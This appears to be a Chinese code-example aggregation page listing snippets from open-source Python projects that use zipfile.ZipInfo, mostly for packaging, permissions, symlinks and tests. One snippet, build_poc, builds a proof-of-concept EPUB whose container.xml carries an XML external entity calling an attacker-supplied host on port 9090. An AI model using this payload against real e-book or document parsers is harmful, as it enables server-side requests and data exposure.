我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用zipfile.ZipInfo()。
def prepare_zip(): from pkg_resources import resource_filename as resource from config import config from json import dumps logger.info('creating/updating gimel.zip') with ZipFile('gimel.zip', 'w', ZIP_DEFLATED) as zipf: info = ZipInfo('config.json') info.external_attr = 0o664 << 16 zipf.writestr(info, dumps(config)) zipf.write(resource('gimel', 'config.py'), 'config.py') zipf.write(resource('gimel', 'gimel.py'), 'gimel.py') zipf.write(resource('gimel', 'logger.py'), 'logger.py') for root, dirs, files in os.walk(resource('gimel', 'vendor')): for file in files: real_file = os.path.join(root, file) relative_file = os.path.relpath(real_file, resource('gimel', '')) zipf.write(real_file, relative_file)
def add_dir_to_zip(zf, path, prefix=''): ''' Add a directory recursively to the zip file with an optional prefix. ''' if prefix: zi = zipfile.ZipInfo(prefix + '/') zi.external_attr = 16 zf.writestr(zi, '') cwd = os.path.abspath(os.getcwd()) try: os.chdir(path) fp = (prefix + ('/' if prefix else '')).replace('//', '/') for f in os.listdir('.'): arcname = fp + f if os.path.isdir(f): add_dir_to_zip(zf, f, prefix=arcname) else: zf.write(f, arcname) finally: os.chdir(cwd)
def _write_symlink(self, zf, link_target, link_path): """Package symlinks with appropriate zipfile metadata.""" info = zipfile.ZipInfo() info.filename = link_path info.create_system = 3 # Magic code for symlinks / py2/3 compat # 27166663808 = (stat.S_IFLNK | 0755) << 16 info.external_attr = 2716663808 zf.writestr(info, link_target)
def write_empty_dir(self, arcname, time_spec=TimeSpec.NOW, comment=None): """Explicitly add an empty directory entry to the archive""" self._checkzfile() arcname = self.cleanup_name(arcname, True) arcname_enc, arcname_is_utf8 = self.encode_name(arcname) comment_is_utf8 = False zinfo = zipfile.ZipInfo(arcname_enc) #zinfo.filename = arcname_enc zinfo.date_time = self.timespec_to_zipinfo(time_spec) zinfo.compress_type = zipfile.ZIP_STORED zinfo.external_attr = 0o40775 << 16 # unix attributes drwxr-xr-x zinfo.external_attr |= 0x10 # MS-DOS directory flag if comment is not None: zinfo.comment, comment_is_utf8 = self.encode_name(comment) if arcname_is_utf8 or comment_is_utf8: zinfo.flag_bits |= 1 << 11 self.zfile.writestr(zinfo, b'')
def open_bin(self, name: str): """Open a file in bytes mode or raise FileNotFoundError. The filesystem needs to be open while accessing this. """ self._check_open() # We need the zipinfo object. if isinstance(name, ZipInfo): info = name else: name = name.replace('\\', '/') try: info = self._name_to_info[name.casefold()] except KeyError: raise FileNotFoundError('{}:{}'.format(self.path, name)) from None return self._ref.open(info)
def build_poc(server): xxe = """<?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://%s:9090/">]> <container version="1.0" xmlns="urn:oasis:names:tc:opendocument:xmlns:container"> <rootfiles> <rootfile full-path="content.opf" media-type="application/oebps-package+xml">&xxe;</rootfile> </rootfiles> </container>""" % server f = StringIO() z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED) zipinfo = zipfile.ZipInfo("META-INF/container.xml") zipinfo.external_attr = 0777 << 16L z.writestr(zipinfo, xxe) z.close() epub = open('poc.epub','wb') epub.write(f.getvalue()) epub.close()
def add_to_zipfile(zf, name, base, zf_names): abspath = j(base, name) name = name.replace(os.sep, '/') if name in zf_names: raise ValueError('Already added %r to zipfile [%r]' % (name, abspath)) zinfo = zipfile.ZipInfo(filename=name, date_time=(1980, 1, 1, 0, 0, 0)) if os.path.isdir(abspath): if not os.listdir(abspath): return zinfo.external_attr = 0o700 << 16 zf.writestr(zinfo, '') for x in os.listdir(abspath): add_to_zipfile(zf, name + os.sep + x, base, zf_names) else: ext = os.path.splitext(name)[1].lower() if ext in ('.dll',): raise ValueError('Cannot add %r to zipfile' % abspath) zinfo.external_attr = 0o600 << 16 if ext in ('.py', '.pyc', '.pyo'): with open(abspath, 'rb') as f: zf.writestr(zinfo, f.read()) zf_names.add(name)
def setup_class(cls): "create a zip egg and add it to sys.path" egg = tempfile.NamedTemporaryFile(suffix='.egg', delete=False) zip_egg = zipfile.ZipFile(egg, 'w') zip_info = zipfile.ZipInfo() zip_info.filename = 'mod.py' zip_info.date_time = cls.ref_time.timetuple() zip_egg.writestr(zip_info, 'x = 3\n') zip_info = zipfile.ZipInfo() zip_info.filename = 'data.dat' zip_info.date_time = cls.ref_time.timetuple() zip_egg.writestr(zip_info, 'hello, world!') zip_egg.close() egg.close() sys.path.append(egg.name) cls.finalizers.append(EggRemover(egg.name))
def open(self, name_or_info, mode="r", pwd=None): """Return file-like object for 'name'.""" # A non-monkey-patched version would contain most of zipfile.py ef = zipfile.ZipFile.open(self, name_or_info, mode, pwd) if isinstance(name_or_info, zipfile.ZipInfo): name = name_or_info.filename else: name = name_or_info if (name in self._expected_hashes and self._expected_hashes[name] != None): expected_hash = self._expected_hashes[name] try: _update_crc_orig = ef._update_crc except AttributeError: warnings.warn('Need ZipExtFile._update_crc to implement ' 'file hash verification (in Python >= 2.7)') return ef running_hash = self._hash_algorithm() if hasattr(ef, '_eof'): # py33 def _update_crc(data): _update_crc_orig(data) running_hash.update(data) if ef._eof and running_hash.digest() != expected_hash: raise BadWheelFile("Bad hash for file %r" % ef.name) else: def _update_crc(data, eof=None): _update_crc_orig(data, eof=eof) running_hash.update(data) if eof and running_hash.digest() != expected_hash: raise BadWheelFile("Bad hash for file %r" % ef.name) ef._update_crc = _update_crc elif self.strict and name not in self._expected_hashes: raise BadWheelFile("No expected hash for file %r" % ef.name) return ef
def open(self, name_or_info, mode="r", pwd=None): """Return file-like object for 'name'.""" # A non-monkey-patched version would contain most of zipfile.py ef = zipfile.ZipFile.open(self, name_or_info, mode, pwd) if isinstance(name_or_info, zipfile.ZipInfo): name = name_or_info.filename else: name = name_or_info if name in self._expected_hashes and self._expected_hashes[name] is not None: expected_hash = self._expected_hashes[name] try: _update_crc_orig = ef._update_crc except AttributeError: warnings.warn('Need ZipExtFile._update_crc to implement ' 'file hash verification (in Python >= 2.7)') return ef running_hash = self._hash_algorithm() if hasattr(ef, '_eof'): # py33 def _update_crc(data): _update_crc_orig(data) running_hash.update(data) if ef._eof and running_hash.digest() != expected_hash: raise BadWheelFile("Bad hash for file %r" % ef.name) else: def _update_crc(data, eof=None): _update_crc_orig(data, eof=eof) running_hash.update(data) if eof and running_hash.digest() != expected_hash: raise BadWheelFile("Bad hash for file %r" % ef.name) ef._update_crc = _update_crc elif self.strict and name not in self._expected_hashes: raise BadWheelFile("No expected hash for file %r" % ef.name) return ef
def archive(self, build_dir): assert self.source_dir create_archive = True archive_name = '%s-%s.zip' % (self.name, self.installed_version) archive_path = os.path.join(build_dir, archive_name) if os.path.exists(archive_path): response = ask_path_exists( 'The file %s exists. (i)gnore, (w)ipe, (b)ackup ' % display_path(archive_path), ('i', 'w', 'b')) if response == 'i': create_archive = False elif response == 'w': logger.warn('Deleting %s' % display_path(archive_path)) os.remove(archive_path) elif response == 'b': dest_file = backup_dir(archive_path) logger.warn('Backing up %s to %s' % (display_path(archive_path), display_path(dest_file))) shutil.move(archive_path, dest_file) if create_archive: zip = zipfile.ZipFile(archive_path, 'w', zipfile.ZIP_DEFLATED) dir = os.path.normcase(os.path.abspath(self.source_dir)) for dirpath, dirnames, filenames in os.walk(dir): if 'pip-egg-info' in dirnames: dirnames.remove('pip-egg-info') for dirname in dirnames: dirname = os.path.join(dirpath, dirname) name = self._clean_zip_name(dirname, dir) zipdir = zipfile.ZipInfo(self.name + '/' + name + '/') zipdir.external_attr = 0x1ED << 16 # 0o755 zip.writestr(zipdir, '') for filename in filenames: if filename == PIP_DELETE_MARKER_FILENAME: continue filename = os.path.join(dirpath, filename) name = self._clean_zip_name(filename, dir) zip.write(filename, self.name + '/' + name) zip.close() logger.indent -= 2 logger.notify('Saved %s' % display_path(archive_path))
def _extract(self, member, path=None, pwd=None): """for zipfile py2.5 borrowed from cpython""" if not isinstance(member, zipfile.ZipInfo): member = self.getinfo(member) if path is None: path = os.getcwd() return _extract_member(self, member, path, pwd)
def sponsor_zip_logo_files(request): """Return a zip file of sponsor web and print logos""" zip_stringio = StringIO() zipfile = ZipFile(zip_stringio, "w") try: benefits = Benefit.objects.all() for benefit in benefits: dir_name = benefit.name.lower().replace(" ", "_").replace('/', '_') for level in SponsorLevel.objects.all(): level_name = level.name.lower().replace(" ", "_").replace('/', '_') for sponsor in Sponsor.objects.filter(level=level, active=True): sponsor_name = sponsor.name.lower().replace(" ", "_").replace('/', '_') full_dir = "/".join([dir_name, level_name, sponsor_name]) for sponsor_benefit in SponsorBenefit.objects.filter( benefit=benefit, sponsor=sponsor, active=True, ).exclude(upload=''): if os.path.exists(sponsor_benefit.upload.path): modtime = time.gmtime(os.stat(sponsor_benefit.upload.path).st_mtime) with open(sponsor_benefit.upload.path, "rb") as f: fname = os.path.split(sponsor_benefit.upload.name)[-1] zipinfo = ZipInfo(filename=full_dir + "/" + fname, date_time=modtime) zipfile.writestr(zipinfo, f.read()) else: log.debug("No such sponsor file: %s" % sponsor_benefit.upload.path) finally: zipfile.close() response = HttpResponse(zip_stringio.getvalue(), content_type="application/zip") prefix = settings.CONFERENCE_URL_PREFIXES[settings.CONFERENCE_ID] response['Content-Disposition'] = \ 'attachment; filename="pycon_%s_sponsorlogos.zip"' % prefix return response
def test_write_zip(self): with patch('%s.zipfile.ZipFile' % pbm, autospec=True) as mock_zf: with patch('%s.logger' % pbm, autospec=True) as mock_logger: self.cls._write_zip('myfsrc', 'mypath.zip') # the only way I can find to capture attributes being set on the ZipInfo # is to not mock it, but use a real ZipInfo object. Unfortunately, that # makes assertin on calls a bit more difficult... assert len(mock_zf.mock_calls) == 4 assert mock_zf.mock_calls[0] == call('mypath.zip', 'w') assert mock_zf.mock_calls[1] == call().__enter__() assert mock_zf.mock_calls[3] == call().__exit__(None, None, None) # ok, now handle the second call, which should have the ZipInfo # as its first argument... # test that it's the right chained method call assert mock_zf.mock_calls[2][0] == '().__enter__().writestr' # test its arguments arg_tup = mock_zf.mock_calls[2][1] assert isinstance(arg_tup[0], ZipInfo) assert arg_tup[0].filename == 'webhook2lambda2sqs_func.py' assert arg_tup[0].date_time == (2016, 7, 1, 2, 3, 4) assert arg_tup[0].external_attr == 0x0755 << 16 assert arg_tup[1] == 'myfsrc' assert mock_logger.mock_calls == [ call.debug('setting zipinfo date to: %s', (2016, 7, 1, 2, 3, 4)), call.debug('setting zipinfo file mode to: %s', (0x0755 << 16)), call.debug('writing zip file at: %s', 'mypath.zip') ]
def _write_zip(self, func_src, fpath): """ Write the function source to a zip file, suitable for upload to Lambda. Note there's a bit of undocumented magic going on here; Lambda needs the execute bit set on the module with the handler in it (i.e. 0755 or 0555 permissions). There doesn't seem to be *any* documentation on how to do this in the Python docs. The only real hint comes from the source code of ``zipfile.ZipInfo.from_file()``, which includes: st = os.stat(filename) ... zinfo.external_attr = (st.st_mode & 0xFFFF) << 16 # Unix attributes :param func_src: lambda function source :type func_src: str :param fpath: path to write the zip file at :type fpath: str """ # get timestamp for file now = datetime.now() zi_tup = (now.year, now.month, now.day, now.hour, now.minute, now.second) logger.debug('setting zipinfo date to: %s', zi_tup) # create a ZipInfo so we can set file attributes/mode zinfo = zipfile.ZipInfo('webhook2lambda2sqs_func.py', zi_tup) # set file mode zinfo.external_attr = 0x0755 << 16 logger.debug('setting zipinfo file mode to: %s', zinfo.external_attr) logger.debug('writing zip file at: %s', fpath) with zipfile.ZipFile(fpath, 'w') as z: z.writestr(zinfo, func_src)
def _extract_files_from_zip(self, zip_file): for item in zip_file.infolist(): # not using ZipFile.extractall() for security reasons assert isinstance(item, ZipInfo) LOGGER.debug('unzipping item: {}'.format(item.filename)) try: zip_file.extract(item, self.tmpdir.abspath()) except: LOGGER.error('failed to extract archive member: {}'.format(item.filename)) raise
def IsSymlink(zip_file, name): zi = zip_file.getinfo(name) # The two high-order bytes of ZipInfo.external_attr represent # UNIX permissions and file type bits. return stat.S_ISLNK(zi.external_attr >> 16L)
def AddToZipHermetic(zip_file, zip_path, src_path=None, data=None, compress=None): """Adds a file to the given ZipFile with a hard-coded modified time. Args: zip_file: ZipFile instance to add the file to. zip_path: Destination path within the zip file. src_path: Path of the source file. Mutually exclusive with |data|. data: File data as a string. compress: Whether to enable compression. Default is taken from ZipFile constructor. """ assert (src_path is None) != (data is None), ( '|src_path| and |data| are mutually exclusive.') CheckZipPath(zip_path) zipinfo = zipfile.ZipInfo(filename=zip_path, date_time=HERMETIC_TIMESTAMP) zipinfo.external_attr = _HERMETIC_FILE_ATTR if src_path and os.path.islink(src_path): zipinfo.filename = zip_path zipinfo.external_attr |= stat.S_IFLNK << 16L # mark as a symlink zip_file.writestr(zipinfo, os.readlink(src_path)) return if src_path: with file(src_path) as f: data = f.read() # zipfile will deflate even when it makes the file bigger. To avoid # growing files, disable compression at an arbitrary cut off point. if len(data) < 16: compress = False # None converts to ZIP_STORED, when passed explicitly rather than the # default passed to the ZipFile constructor. compress_type = zip_file.compression if compress is not None: compress_type = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED zip_file.writestr(zipinfo, data, compress_type)
def _add_zip(self, zfile, name, data, date_time): """ Add a zip file to an archive """ zipinfo = zipfile.ZipInfo(name) zipinfo.date_time = date_time zipinfo.compress_type = zipfile.ZIP_DEFLATED zipinfo.external_attr = 0o644 << 16 zfile.writestr(zipinfo, data)
def write_zip_str(self, zfile, name, bytes, compress_type=zipfile.ZIP_DEFLATED): localtime = time.localtime(time.time()) zinfo = zipfile.ZipInfo(name, localtime) # Add some standard UNIX file access permissions (-rw-r--r--). zinfo.external_attr = (0x81a4 & 0xFFFF) << 16L zinfo.compress_type = compress_type zfile.writestr(zinfo, bytes)
def write_zip_str( self, zfile, name, bytes, compress_type=zipfile.ZIP_DEFLATED): localtime = time.localtime(time.time()) zinfo = zipfile.ZipInfo(name, localtime) # Add some standard UNIX file access permissions (-rw-r--r--). zinfo.external_attr = (0x81a4 & 0xFFFF) << 16L zinfo.compress_type = compress_type zfile.writestr(zinfo, bytes)
def write_to_archive(archive, project_name, files): """Write files to the project_name folder of the archive.""" tstamp = datetime.now().timetuple()[:6] for filepath, contents in files: if filepath is None or contents in (None, 'null'): log.debug('Skipping file "%s" with contents "%r"', filepath, contents) continue filepath = join(project_name, filepath) fileinfo = zipfile.ZipInfo(filepath, tstamp) fileinfo.external_attr = 0o666 << 16 archive.writestr(fileinfo, contents, zipfile.ZIP_DEFLATED)
def AddToZipHermetic(zip_file, zip_path, src_path=None, data=None, compress=None): """Adds a file to the given ZipFile with a hard-coded modified time. Args: zip_file: ZipFile instance to add the file to. zip_path: Destination path within the zip file. src_path: Path of the source file. Mutually exclusive with |data|. data: File data as a string. compress: Whether to enable compression. Default is take from ZipFile constructor. """ assert (src_path is None) != (data is None), ( '|src_path| and |data| are mutually exclusive.') CheckZipPath(zip_path) zipinfo = zipfile.ZipInfo(filename=zip_path, date_time=HERMETIC_TIMESTAMP) zipinfo.external_attr = _HERMETIC_FILE_ATTR if src_path and os.path.islink(src_path): zipinfo.filename = zip_path zipinfo.external_attr |= stat.S_IFLNK << 16L # mark as a symlink zip_file.writestr(zipinfo, os.readlink(src_path)) return if src_path: with file(src_path) as f: data = f.read() # zipfile will deflate even when it makes the file bigger. To avoid # growing files, disable compression at an arbitrary cut off point. if len(data) < 16: compress = False # None converts to ZIP_STORED, when passed explicitly rather than the # default passed to the ZipFile constructor. compress_type = zip_file.compression if compress is not None: compress_type = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED zip_file.writestr(zipinfo, data, compress_type)
def doTest(self, expected_ext, files, *modules, **kw): z = ZipFile(TEMP_ZIP, "w") try: for name, (mtime, data) in files.items(): zinfo = ZipInfo(name, time.localtime(mtime)) zinfo.compress_type = self.compression z.writestr(zinfo, data) z.close() stuff = kw.get("stuff", None) if stuff is not None: # Prepend 'stuff' to the start of the zipfile with open(TEMP_ZIP, "rb") as f: data = f.read() with open(TEMP_ZIP, "wb") as f: f.write(stuff) f.write(data) sys.path.insert(0, TEMP_ZIP) mod = __import__(".".join(modules), globals(), locals(), ["__dummy__"]) call = kw.get('call') if call is not None: call(mod) if expected_ext: file = mod.get_file() self.assertEqual(file, os.path.join(TEMP_ZIP, *modules) + expected_ext) finally: z.close() os.remove(TEMP_ZIP)